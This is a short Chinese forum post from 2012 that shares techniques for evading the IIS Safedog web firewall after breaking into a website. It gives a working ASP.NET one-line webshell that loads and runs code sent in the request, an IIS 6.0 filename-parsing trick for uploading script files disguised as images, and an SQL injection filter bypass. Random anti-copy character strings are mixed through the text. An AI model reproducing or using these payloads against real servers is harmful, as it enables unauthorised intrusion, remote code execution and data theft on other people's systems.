1、绕过IIS安全狗的一句话。0 I! P3 l5 ?1 B' J
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。3 l" [3 Z! H+ c, _% p( ?0 i
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
# c- O+ `7 E+ }: r D2 [
3 T4 G& R4 ^# F2、IIS6.0解析漏洞遇到安全狗。
' U. |+ ^1 n1 C6 A) R; A文件名为. `5 t q; j+ C
http://www.xxxxx.com/sh3llc0de.asp;1.jpg, h) A G+ R6 ^. M5 [% ~
2 K1 I: A5 F5 Z# E/ a这样的会被IIS安全狗果断屏蔽。
5 R8 y4 Y& U, b6 J) a& H% T& G改成如下名称,IIS6一样会解析:" t% k' k" z& @8 Y
www.xxxxx.com/;1.asp;1.jpg4 e7 P# b" r8 ^$ H
; o" y- U0 e4 D' a3、安全狗的注入绕过。
2 u% Z4 m! P! M+ C, E- ^常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
7 A) Z# a- w/ Q! Z但如果:
2 X! n; }8 Y U8 y" Q: Pr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
9 d. {+ _% w* a) t就可以成功绕过了。! p; a7 e$ m' m4 l
~ j' n/ Q9 w
0 b- ]2 h+ g: _( ]# N; Q |
发表于 2012-10-31 08:25:30
收藏
分享
支持
反对